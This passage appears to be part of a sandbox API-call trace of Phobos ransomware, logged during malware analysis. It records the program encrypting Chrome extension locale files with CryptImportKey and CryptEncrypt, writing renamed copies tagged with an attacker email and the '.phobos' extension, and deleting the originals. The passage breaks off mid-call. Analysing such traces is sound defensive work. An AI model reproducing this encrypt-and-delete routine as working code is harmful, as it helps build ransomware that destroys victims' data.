dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.871] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.871] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.871] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9f, lpOverlapped=0x0) returned 1 [0151.872] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0, dwBufLen=0xa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0) returned 1 [0151.872] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xa0, lpOverlapped=0x0) returned 1 [0151.873] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.873] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.873] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.873] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.873] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.873] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.874] CloseHandle (hObject=0x130) returned 1 [0151.874] CloseHandle (hObject=0x138) returned 1 [0151.874] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json")) returned 1 [0151.875] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.876] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.876] CloseHandle (hObject=0x138) returned 1 [0151.876] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json")) returned 0x2020 [0151.876] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.876] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.876] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.877] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.877] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.877] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.878] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.878] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.879] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.879] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.879] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.879] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.879] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.879] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.879] CloseHandle (hObject=0x138) returned 1 [0151.879] CloseHandle (hObject=0x130) returned 1 [0151.880] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json")) returned 1 [0151.881] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.882] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.882] CloseHandle (hObject=0x130) returned 1 [0151.882] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json")) returned 0x2020 [0151.882] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.882] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.882] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.883] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.883] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.883] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.884] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.884] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.885] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.885] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.885] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.885] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.885] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.886] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.886] CloseHandle (hObject=0x130) returned 1 [0151.886] CloseHandle (hObject=0x138) returned 1 [0151.886] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json")) returned 1 [0151.887] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.888] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.888] CloseHandle (hObject=0x138) returned 1 [0151.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json")) returned 0x2020 [0151.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.888] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.889] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.890] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.890] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.890] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.891] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.891] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.893] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.893] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.893] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.893] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.893] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.893] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.893] CloseHandle (hObject=0x138) returned 1 [0151.893] CloseHandle (hObject=0x130) returned 1 [0151.893] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json")) returned 1 [0151.895] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.895] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.895] CloseHandle (hObject=0x130) returned 1 [0151.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json")) returned 0x2020 [0151.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.896] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.896] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.896] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.896] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.896] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.898] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.898] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.900] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.900] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.900] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, 